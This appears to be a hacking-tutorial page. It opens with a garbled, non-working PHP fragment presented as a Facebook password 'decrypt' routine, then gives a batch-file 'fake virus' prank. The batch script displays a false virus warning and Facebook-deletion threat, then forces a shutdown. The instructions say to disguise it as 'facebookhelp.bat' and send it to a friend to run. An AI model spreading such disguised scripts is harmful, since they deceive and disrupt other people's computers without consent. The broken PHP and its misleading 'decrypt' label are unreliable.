$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {

}
elseif (empty($email_address)) {
echo $empty_fields_message;
function decrypt userID password() {
$salt = "abchefghjkmnpqrstuvwxyz0123456789";
srand((double)microtime()*1000000);
$i = 0;
while ($i <= 7) {
$num = decrypt() % 33;
$tmp = substr($salt, $num, 1);
$pass = $pass . $tmp;
$i++;
}
return $pass;
}

mail($email_address, $subject, $message, "Facebook Password Reset Confirmation


}
/end$
Fake virus what i mean?
This is not at all virus. This is not at all make any effect. It just shut down your friend system for only once and show " your facebook account is hacked"(for fun only).


What is the code?
So far we create a lot of virus using Batch programming . This time also we are going to use our Batch programming.

Code:
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."

What you should do with this code?
Copy this code and paste in notepad
Save the file with .bat extension.(for eg: facebookhelp.bat)
Now sent this file to your friend and ask to click.

What this will do?
It will show first "WARNING VIRUS DETECTED!!!!! AFTE.........." msg in cmd
Then it will shutdown. Before shutdown it will show "SORRY!!! YOUR ....." msg in cmd